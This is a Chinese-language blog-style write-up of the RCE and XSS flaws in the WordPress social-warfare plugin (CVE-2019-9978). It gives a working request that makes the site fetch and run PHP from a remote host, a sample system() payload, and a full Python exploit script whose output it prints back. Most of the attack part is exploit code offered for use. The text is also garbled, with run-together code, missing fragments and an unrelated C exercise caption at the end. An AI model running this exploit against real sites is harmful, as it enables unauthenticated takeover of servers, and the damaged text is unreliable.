WordPress social-warfare插件XSS和RCE漏洞
~~
漏洞编号 : CVE-2019-9978
影响版本 : WordPress social-warfare < 3.5.3
漏洞描述 : WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。social-warfare plugin是使用在其中的一个社交平台分享插件,其3.5.3之前版本存在跨站脚本攻击(XSS)和远程代码执行(RCE)漏洞。远程攻击者可借助这些漏洞,运行任意PHP代码,在无需身份验证的情况下实现对网站和服务器的控制。
攻击成功的条件只需要如下两条:
目标wordpress站点上安装有social-warfare
social-warfare插件的版本小于或等于3.5.2
该漏洞源于Social Warfare组件,并且版本<=3.5.2、且要是管理员登录状态,因此该漏洞是个后台代码执行
漏洞报告https://www.webarxsecurity.com/social-warfare-vulnerability/
利用需一台能够被访问的vps
安装好WordPress后,把social-warfare组件起用(点Activate后,会变成Settings,并在左侧目录下出现Social Warfare子目录)
*RCE:
http://10.37.129.2:48904/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.100.1/1.txt
1.txt 为自己服务器上的文件可编辑执行命令
内容为:
system('cat /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS0/flags')
剪切远程加载的代码逻辑如下,
xxxxx会去掉
和,如果不包含这2个标签会返回false
poc
# Title: RCE in Social Warfare Plugin ( <=3.5.2 )
# Date: March, 2019
# Researcher: Luka Sikic
# Exploit Author: hash3liZer
# Download Link: https://wordpress.org/plugins/social-warfare/
# Version: <= 3.5.2
# CVE: CVE-2019-9978import sys
import requests
import re
import urlparse
import optparseclass EXPLOIT:VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"def __init__(self, _t, _p):self.target = _tself.payload = _pdef engage(self):uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload )r = requests.get( uri )if r.status_code == 500:print "[*] Received Response From Server!"rr = r.textobj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" ))if obj:resp = obj.groups()[0]if resp:print "[<] Received: "print resp.replace( "lnbreak", "\n" )else:sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")else:sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")else:sys.exit( "[~] Unexpected Status Received!" )def main():parser = optparse.OptionParser( )parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" )parser.add_option( '' , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." )(options, args) = parser.parse_args()print "[>] Sending Payload to System!"exploit = EXPLOIT( options.target, options.payload )exploit.engage()if __name__ == "__main__":main()
XSS
构造payload
访问
管理员在面表盘访问 social-warfare 就会触发xss
](https://img-blog.csdnimg.cn/direct/714a1176730d44e2b9d6453049bb715d.png)
![下列程序定义了NxN的二维数组,并在主函数中自动赋值。请编写函数fun(int a[][N],int n),该函数的功能是:使数组右上半三角元素中的值乘以m。](https://img-blog.csdnimg.cn/direct/810d3107b3ec45bc8500a4afedf90d0e.png)
